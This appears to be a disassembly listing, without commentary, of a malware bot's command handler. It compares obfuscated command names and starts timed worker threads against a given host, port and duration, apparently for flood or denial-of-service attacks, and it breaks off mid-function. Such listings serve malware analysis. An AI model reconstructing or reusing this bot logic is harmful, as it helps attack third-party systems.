push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
jmp loc_4127E3
; ---------------------------------------------------------------------------
loc_41154A: ; CODE XREF: sub_40A938+6C06�j
push dword ptr [ebx]
push offset aXmz20Gjkq ; "xMz20//gJkQ/"
call edi ; dword_437174
test eax, eax
jnz loc_411763
xor edi, edi
cmp [ebx+4], edi
jz loc_411759
cmp [ebx+8], edi
jz loc_411759
cmp [ebx+0Ch], edi
jz loc_411759
push 0Dh
call sub_423737
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jle short loc_4115CC
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_4115B4
cmp [ebp+arg_18], 0
jnz short loc_4115BE
push eax
push ebx
push offset aLcgg60qk2mf0 ; "Lcgg60QK2mf0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_4115B4: ; CODE XREF: sub_40A938+6C5E�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_4115BE: ; CODE XREF: sub_40A938+6C64�j
push [ebp+arg_C]
push ebx
loc_4115C2: ; CODE XREF: sub_40A938+6E06�j
push offset aLcgg60qk2mf0 ; "Lcgg60QK2mf0"
jmp loc_414856
; ---------------------------------------------------------------------------
loc_4115CC: ; CODE XREF: sub_40A938+6C4E�j
mov eax, [ebp+arg_14]
mov [ebp+var_1AF8], eax
mov eax, [ebp+arg_18]
mov [ebp+var_1AFC], eax
cmp eax, edi
lea eax, [ebp+var_1B90]
jnz short loc_4115ED
push dword ptr [esi+0Ch]
jmp short loc_4115EF
; ---------------------------------------------------------------------------
loc_4115ED: ; CODE XREF: sub_40A938+6CAE�j
push dword ptr [esi]
loc_4115EF: ; CODE XREF: sub_40A938+6CB3�j
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_1C14], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_1C10]
push eax
call sub_429C40
push dword ptr [ebx+8]
call sub_42A030
mov [ebp+var_1B08], eax
push dword ptr [ebx+0Ch]
call sub_42A030
add esp, 14h
cmp [ebp+arg_14], 0
mov [ebp+var_1B04], eax
mov edi, offset aLcgg60qk2mf0 ; "Lcgg60QK2mf0"
jnz short loc_41166B
cmp [ebp+arg_18], 0
jnz short loc_411671
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push edi
push offset aSSForDSecsWith ; "%s --> (%s) for %d secs with %d ms dela"...
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 1Ch
loc_41166B: ; CODE XREF: sub_40A938+6D00�j
cmp [ebp+arg_18], 0
jz short loc_41169B
loc_411671: ; CODE XREF: sub_40A938+6D06�j
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push edi
push offset aSSForDSecsWith ; "%s --> (%s) for %d secs with %d ms dela"...
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 1Ch
loc_41169B: ; CODE XREF: sub_40A938+6D37�j
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push edi
push offset aSSForDSecsWith ; "%s --> (%s) for %d secs with %d ms dela"...
push 0Dh
call sub_4233DE
add esp, 18h
mov [ebp+var_1B10], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_1C14]
push edi
push eax
push offset sub_4283DC
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_1B10]
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jnz short loc_41174B
cmp [ebp+arg_14], 0
mov ebx, dword_43716C
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_41172C
cmp [ebp+arg_18], 0
jnz short loc_411736
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aLcgg60qk2mf0 ; "Lcgg60QK2mf0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_41172C: ; CODE XREF: sub_40A938+6DD0�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_411736: ; CODE XREF: sub_40A938+6DD6�j
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
jmp loc_4115C2
; ---------------------------------------------------------------------------
loc_411743: ; CODE XREF: sub_40A938+6E1A�j
push 32h
call dword_43718C ; Sleep
loc_41174B: ; CODE XREF: sub_40A938+6DBF�j
cmp [ebp+var_1AF4], 0
jz short loc_411743
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_411759: ; CODE XREF: sub_40A938+6C28�j
; sub_40A938+6C31�j ...
mov edi, offset aLcgg60qk2mf0 ; "Lcgg60QK2mf0"
jmp loc_40BE4A
; ---------------------------------------------------------------------------
loc_411763: ; CODE XREF: sub_40A938+6C1D�j
push dword ptr [ebx]
push offset aNhr6r0qsk450 ; "nHr6r0qsk450"
call edi ; dword_437174
test eax, eax
jnz short loc_41177A
push offset aLcgg60qk2mf0 ; "Lcgg60QK2mf0"
jmp loc_4127E3
; ---------------------------------------------------------------------------
loc_41177A: ; CODE XREF: sub_40A938+6E36�j
push dword ptr [ebx]
push offset aUyfog_dvvny0 ; "UyfOG.DvVnY0"
call edi ; dword_437174
test eax, eax
jnz loc_4119BB
xor edi, edi
cmp [ebx+4], edi
jz loc_4119B1
cmp [ebx+8], edi
jz loc_4119B1
cmp [ebx+0Ch], edi
jz loc_4119B1
cmp [ebx+10h], edi
jz loc_4119B1
push 0Dh
call sub_423737
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jle short loc_411807
loc_4117C1: ; CODE XREF: sub_40A938+70B8�j
; sub_40A938+7263�j ...
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_4117EF
cmp [ebp+arg_18], 0
jnz short loc_4117F9
push [ebp+arg_C]
push ebx
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_4117EF: ; CODE XREF: sub_40A938+6E97�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_4117F9: ; CODE XREF: sub_40A938+6E9D�j
push [ebp+arg_C]
push ebx
loc_4117FD: ; CODE XREF: sub_40A938+705E�j
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
jmp loc_414856
; ---------------------------------------------------------------------------
loc_411807: ; CODE XREF: sub_40A938+6E87�j
mov eax, [ebp+arg_14]
mov [ebp+var_13A8], eax
mov eax, [ebp+arg_18]
mov [ebp+var_13AC], eax
cmp eax, edi
lea eax, [ebp+var_14C4]
jnz short loc_411828
push dword ptr [esi+0Ch]
jmp short loc_41182A
; ---------------------------------------------------------------------------
loc_411828: ; CODE XREF: sub_40A938+6EE9�j
push dword ptr [esi]
loc_41182A: ; CODE XREF: sub_40A938+6EEE�j
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_14CC], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_1444]
push eax
call sub_429C40
push dword ptr [ebx+8]
call sub_42A030
mov [ebp+var_13B8], eax
push dword ptr [ebx+0Ch]
call sub_42A030
mov [ebp+var_13B4], eax
push dword ptr [ebx+10h]
call sub_42A030
add esp, 18h
cmp eax, 1
mov [ebp+var_13BC], eax
jge short loc_411887
loc_41187D: ; CODE XREF: sub_40A938+7132�j
; sub_40A938+72DD�j
mov edi, offset aYhzck13caog0 ; "YhzCK13CaOG0"
jmp loc_413CB1
; ---------------------------------------------------------------------------
loc_411887: ; CODE XREF: sub_40A938+6F43�j
cmp [ebp+arg_14], 0
mov edi, offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
jnz short loc_4118C3
cmp [ebp+arg_18], 0
jnz short loc_4118C9
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 1Ch
loc_4118C3: ; CODE XREF: sub_40A938+6F58�j
cmp [ebp+arg_18], 0
jz short loc_4118F3
loc_4118C9: ; CODE XREF: sub_40A938+6F5E�j
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 1Ch
loc_4118F3: ; CODE XREF: sub_40A938+6F8F�j
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push edi
push 0Dh
call sub_4233DE
add esp, 18h
mov [ebp+var_13B0], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_14CC]
push edi
push eax
push offset sub_41DAA5
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_13B0]
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jnz short loc_4119A3
loc_411951: ; CODE XREF: sub_40A938+7200�j
; sub_40A938+73AB�j ...
cmp [ebp+arg_14], 0
mov ebx, dword_43716C
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_411984
cmp [ebp+arg_18], 0
jnz short loc_41198E
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_411984: ; CODE XREF: sub_40A938+7028�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_41198E: ; CODE XREF: sub_40A938+702E�j
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
jmp loc_4117FD
; ---------------------------------------------------------------------------
loc_41199B: ; CODE XREF: sub_40A938+7072�j
push 32h
call dword_43718C ; Sleep
loc_4119A3: ; CODE XREF: sub_40A938+7017�j
cmp [ebp+var_13A0], 0
jz short loc_41199B
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_4119B1: ; CODE XREF: sub_40A938+6E58�j
; sub_40A938+6E61�j ...
mov edi, offset aYhzck13caog0 ; "YhzCK13CaOG0"
jmp loc_40BE4A
; ---------------------------------------------------------------------------
loc_4119BB: ; CODE XREF: sub_40A938+6E4D�j
push dword ptr [ebx]
push offset aPsern1aagh6_ ; "pSern1AAGh6."
call edi ; dword_437174
test eax, eax
jnz loc_411B56
xor edi, edi
cmp [ebx+4], edi
jz short loc_4119B1
cmp [ebx+8], edi
jz short loc_4119B1
cmp [ebx+0Ch], edi
jz short loc_4119B1
cmp [ebx+10h], edi
jz short loc_4119B1
push 0Dh
call sub_423737
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jg loc_4117C1
mov eax, [ebp+arg_14]
mov [ebp+var_1608], eax
mov eax, [ebp+arg_18]
mov [ebp+var_160C], eax
cmp eax, edi
lea eax, [ebp+var_1724]
jnz short loc_411A17
push dword ptr [esi+0Ch]
jmp short loc_411A19
; ---------------------------------------------------------------------------
loc_411A17: ; CODE XREF: sub_40A938+70D8�j
push dword ptr [esi]
loc_411A19: ; CODE XREF: sub_40A938+70DD�j
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_172C], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_16A4]
push eax
call sub_429C40
push dword ptr [ebx+8]
call sub_42A030
mov [ebp+var_1618], eax
push dword ptr [ebx+0Ch]
call sub_42A030
mov [ebp+var_1614], eax
push dword ptr [ebx+10h]
call sub_42A030
add esp, 18h
cmp eax, 1
mov [ebp+var_161C], eax
jl loc_41187D
cmp [ebp+arg_14], 0
mov edi, offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
jnz short loc_411AAC
cmp [ebp+arg_18], 0
jnz short loc_411AB2
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 1Ch
loc_411AAC: ; CODE XREF: sub_40A938+7141�j
cmp [ebp+arg_18], 0
jz short loc_411ADC
loc_411AB2: ; CODE XREF: sub_40A938+7147�j
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 1Ch
loc_411ADC: ; CODE XREF: sub_40A938+7178�j
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push edi
push 0Dh
call sub_4233DE
add esp, 18h
mov [ebp+var_1610], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_172C]
push edi
push eax
push offset sub_41DC43
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_1610]
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jz loc_411951
jmp short loc_411B48
; ---------------------------------------------------------------------------
loc_411B40: ; CODE XREF: sub_40A938+7217�j
push 32h
call dword_43718C ; Sleep
loc_411B48: ; CODE XREF: sub_40A938+7206�j
cmp [ebp+var_1600], 0
jz short loc_411B40
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_411B56: ; CODE XREF: sub_40A938+708E�j
push dword ptr [ebx]
push offset aXkg84_cesgs_ ; "XkG84.cESgs."
call edi ; dword_437174
test eax, eax
jnz loc_411D01
xor edi, edi
cmp [ebx+4], edi
jz loc_4119B1
cmp [ebx+8], edi
jz loc_4119B1
cmp [ebx+0Ch], edi
jz loc_4119B1
cmp [ebx+10h], edi
jz loc_4119B1
push 0Dh
call sub_423737
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jg loc_4117C1
mov eax, [ebp+arg_14]
mov [ebp+var_14D8], eax
mov eax, [ebp+arg_18]
mov [ebp+var_14DC], eax
cmp eax, edi
lea eax, [ebp+var_15F4]
jnz short loc_411BC2
push dword ptr [esi+0Ch]
jmp short loc_411BC4
; ---------------------------------------------------------------------------
loc_411BC2: ; CODE XREF: sub_40A938+7283�j
push dword ptr [esi]
loc_411BC4: ; CODE XREF: sub_40A938+7288�j
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_15FC], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_1574]
push eax
call sub_429C40
push dword ptr [ebx+8]
call sub_42A030
mov [ebp+var_14E8], eax
push dword ptr [ebx+0Ch]
call sub_42A030
mov [ebp+var_14E4], eax
push dword ptr [ebx+10h]
call sub_42A030
add esp, 18h
cmp eax, 1
mov [ebp+var_14EC], eax
jl loc_41187D
cmp [ebp+arg_14], 0
mov edi, offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
jnz short loc_411C57
cmp [ebp+arg_18], 0
jnz short loc_411C5D
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 1Ch
loc_411C57: ; CODE XREF: sub_40A938+72EC�j
cmp [ebp+arg_18], 0
jz short loc_411C87
loc_411C5D: ; CODE XREF: sub_40A938+72F2�j
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 1Ch
loc_411C87: ; CODE XREF: sub_40A938+7323�j
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push edi
push 0Dh
call sub_4233DE
add esp, 18h
mov [ebp+var_14E0], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_15FC]
push edi
push eax
push offset sub_41DDA8
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_14E0]
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jz loc_411951
jmp short loc_411CF3
; ---------------------------------------------------------------------------
loc_411CEB: ; CODE XREF: sub_40A938+73C2�j
push 32h
call dword_43718C ; Sleep
loc_411CF3: ; CODE XREF: sub_40A938+73B1�j
cmp [ebp+var_14D0], 0
jz short loc_411CEB
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_411D01: ; CODE XREF: sub_40A938+7229�j
push dword ptr [ebx]
push offset aP06vqBfbmo_ ; "p06vq/BFBMo."
call edi ; dword_437174
test eax, eax
jnz loc_411E74
xor edi, edi
cmp [ebx+4], edi
jz loc_4119B1
cmp [ebx+8], edi
jz loc_4119B1
cmp [ebx+0Ch], edi
jz loc_4119B1
push 0Dh
call sub_423737
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jg loc_4117C1
mov eax, [ebp+arg_14]
mov [ebp+var_1C20], eax
mov eax, [ebp+arg_18]
mov [ebp+var_1C24], eax
cmp eax, edi
lea eax, [ebp+var_1D3C]
jnz short loc_411D64
push dword ptr [esi+0Ch]
jmp short loc_411D66
; ---------------------------------------------------------------------------
loc_411D64: ; CODE XREF: sub_40A938+7425�j
push dword ptr [esi]
loc_411D66: ; CODE XREF: sub_40A938+742A�j
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_1D44], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_1CBC]
push eax
call sub_429C40
push dword ptr [ebx+8]
call sub_42A030
mov [ebp+var_1C2C], eax
push dword ptr [ebx+0Ch]
call sub_42A030
add esp, 14h
cmp eax, 1
mov [ebp+var_1C34], eax
mov edi, offset aYhzck13caog0 ; "YhzCK13CaOG0"
jl loc_413CB1
cmp [ebp+arg_14], 0
jnz short loc_411DE0
cmp [ebp+arg_18], 0
jnz short loc_411DE6
push dword ptr [ebx+8]
call sub_42A030
push eax
push dword ptr [ebx+4]
push edi
push offset aSSForDSecs_ ; "%s --> (%s) for (%d secs)."
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 1Ch
loc_411DE0: ; CODE XREF: sub_40A938+7480�j
cmp [ebp+arg_18], 0
jz short loc_411E05
loc_411DE6: ; CODE XREF: sub_40A938+7486�j
push dword ptr [ebx+8]
call sub_42A030
push eax
push dword ptr [ebx+4]
push edi
push offset aSSForDSecs_ ; "%s --> (%s) for (%d secs)."
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 1Ch
loc_411E05: ; CODE XREF: sub_40A938+74AC�j
push dword ptr [ebx+8]
call sub_42A030
push eax
push dword ptr [ebx+4]
push edi
push offset aSSForDSecs_ ; "%s --> (%s) for (%d secs)."
push 0Dh
call sub_4233DE
add esp, 18h
mov [ebp+var_1C28], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_1D44]
push edi
push eax
push offset sub_41E17C
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_1C28]
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jz loc_411951
jmp short loc_411E66
; ---------------------------------------------------------------------------
loc_411E5E: ; CODE XREF: sub_40A938+7535�j
push 32h
call dword_43718C ; Sleep
loc_411E66: ; CODE XREF: sub_40A938+7524�j
cmp [ebp+var_1C18], 0
jz short loc_411E5E
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_411E74: ; CODE XREF: sub_40A938+73D4�j
push dword ptr [ebx]
push offset a3vvsv1vurua ; "3VVsV1VuRUA/"
call edi ; dword_437174
test eax, eax
jnz short loc_411E8B
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
jmp loc_4127E3
; ---------------------------------------------------------------------------
loc_411E8B: ; CODE XREF: sub_40A938+7547�j
push dword ptr [ebx]
push offset aImvbw1shwxq0 ; "iMvbW1SHwxQ0"
call edi ; dword_437174
test eax, eax
jnz loc_4120A3
xor edi, edi
cmp [ebx+4], edi
jz loc_412099
cmp [ebx+8], edi
jz loc_412099
cmp [ebx+0Ch], edi
jz loc_412099
cmp [ebx+10h], edi
jz loc_412099
push 0Dh
call sub_423737
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jle short loc_411F16
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_411EFE
cmp [ebp+arg_18], 0
jnz short loc_411F08
push eax
push ebx
push offset aAxauo_rlggx0 ; "aXauo.rLGgX0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_411EFE: ; CODE XREF: sub_40A938+75A8�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_411F08: ; CODE XREF: sub_40A938+75AE�j
push [ebp+arg_C]
push ebx
loc_411F0C: ; CODE XREF: sub_40A938+7746�j
push offset aAxauo_rlggx0 ; "aXauo.rLGgX0"
jmp loc_414856
; ---------------------------------------------------------------------------
loc_411F16: ; CODE XREF: sub_40A938+7598�j
mov eax, [ebp+arg_14]
mov [ebp+var_1040], eax
mov eax, [ebp+arg_18]
mov [ebp+var_1044], eax
cmp eax, edi
lea eax, [ebp+var_10D4]
jnz short loc_411F37
push dword ptr [esi+0Ch]
jmp short loc_411F39
; ---------------------------------------------------------------------------
loc_411F37: ; CODE XREF: sub_40A938+75F8�j
push dword ptr [esi]
loc_411F39: ; CODE XREF: sub_40A938+75FD�j
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_1158], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_1154]
push eax
call sub_429C40
push dword ptr [ebx+8]
call sub_42A030
mov [ebp+var_1050], eax
push dword ptr [ebx+0Ch]
call sub_42A030
mov [ebp+var_1048], eax
push dword ptr [ebx+10h]
call sub_42A030
add esp, 18h
cmp eax, 1
mov [ebp+var_104C], eax
mov edi, offset aAxauo_rlggx0 ; "aXauo.rLGgX0"
jl loc_413CB1
cmp [ebp+arg_14], 0
jnz short loc_411FC1
cmp [ebp+arg_18], 0
jnz short loc_411FC7
push dword ptr [ebx+8]
call sub_42A030
push eax
push dword ptr [ebx+4]
push edi
push offset aSSD_1 ; "%s --> (%s:%d)"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 1Ch
loc_411FC1: ; CODE XREF: sub_40A938+7661�j
cmp [ebp+arg_18], 0
jz short loc_411FE6
loc_411FC7: ; CODE XREF: sub_40A938+7667�j
push dword ptr [ebx+8]
call sub_42A030
push eax
push dword ptr [ebx+4]
push edi
push offset aSSD_1 ; "%s --> (%s:%d)"
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 1Ch
loc_411FE6: ; CODE XREF: sub_40A938+768D�j
push dword ptr [ebx+8]
call sub_42A030
push eax
push dword ptr [ebx+4]
push edi
push offset aSSD_1 ; "%s --> (%s:%d)"
push 0Dh
call sub_4233DE
add esp, 18h
mov [ebp+var_1054], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_1158]
push edi
push eax
push offset sub_41EBD7
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_1054]
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jnz short loc_41208B
cmp [ebp+arg_14], 0
mov ebx, dword_43716C
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_41206C
cmp [ebp+arg_18], 0
jnz short loc_412076
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aAxauo_rlggx0 ; "aXauo.rLGgX0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_41206C: ; CODE XREF: sub_40A938+7710�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_412076: ; CODE XREF: sub_40A938+7716�j
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
jmp loc_411F0C
; ---------------------------------------------------------------------------
loc_412083: ; CODE XREF: sub_40A938+775A�j
push 32h
call dword_43718C ; Sleep
loc_41208B: ; CODE XREF: sub_40A938+76FF�j
cmp [ebp+var_103C], 0
jz short loc_412083
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_412099: ; CODE XREF: sub_40A938+7569�j
; sub_40A938+7572�j ...
mov edi, offset aAxauo_rlggx0 ; "aXauo.rLGgX0"
jmp loc_40BE4A
; ---------------------------------------------------------------------------
loc_4120A3: ; CODE XREF: sub_40A938+755E�j
push dword ptr [ebx]
push offset a4h4m_q_guy_ ; "4h4m/.Q.GUy."
call edi ; dword_437174
test eax, eax
jnz short loc_4120BA
push offset aAxauo_rlggx0 ; "aXauo.rLGgX0"
jmp loc_4127E3
; ---------------------------------------------------------------------------
loc_4120BA: ; CODE XREF: sub_40A938+7776�j
push dword ptr [ebx]
push offset aX_62c_3ldcp ; "X.62C.3LDCP/"
call edi ; dword_437174
test eax, eax
jnz loc_4122F3
xor edi, edi
cmp [ebx+4], edi
jz loc_4122E9
cmp [ebx+8], edi
jz loc_4122E9
cmp [ebx+0Ch], edi
jz loc_4122E9
cmp [ebx+10h], edi
jz loc_4122E9
push 0Dh
call sub_423737
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jle short loc_412145
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_41212D
cmp [ebp+arg_18], 0
jnz short loc_412137
push eax
push ebx
push offset aXwzwo1pqcgt16n ; "XWzwO1PqcgT16N5aw.affEY1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_41212D: ; CODE XREF: sub_40A938+77D7�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_412137: ; CODE XREF: sub_40A938+77DD�j
push [ebp+arg_C]
push ebx
loc_41213B: ; CODE XREF: sub_40A938+7996�j
push offset aXwzwo1pqcgt16n ; "XWzwO1PqcgT16N5aw.affEY1"
jmp loc_414856
; ---------------------------------------------------------------------------
loc_412145: ; CODE XREF: sub_40A938+77C7�j
mov eax, [ebp+arg_14]
mov [ebp+var_1284], eax
mov eax, [ebp+arg_18]
mov [ebp+var_1288], eax
cmp eax, edi
lea eax, [ebp+var_1318]
jnz short loc_412166
push dword ptr [esi+0Ch]
jmp short loc_412168
; ---------------------------------------------------------------------------
loc_412166: ; CODE XREF: sub_40A938+7827�j
push dword ptr [esi]
loc_412168: ; CODE XREF: sub_40A938+782C�j
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_139C], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_1398]
push eax
call sub_429C40
push dword ptr [ebx+8]
call sub_42A030
mov [ebp+var_1294], eax
push dword ptr [ebx+0Ch]
call sub_42A030
mov [ebp+var_1290], eax
push dword ptr [ebx+10h]
call sub_42A030
add esp, 18h
cmp eax, 1
mov [ebp+var_128C], eax
mov edi, offset aXwzwo1pqcgt16n ; "XWzwO1PqcgT16N5aw.affEY1"
jl loc_413CB1
cmp [ebp+arg_14], 0
jnz short loc_4121FB
cmp [ebp+arg_18], 0
jnz short loc_412201
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push edi
push offset aSSDForDSecS ; "%s --> (%s:%d) for %d sec's"
push dword ptr [esi+0Ch]
push [ebp+arg_10]
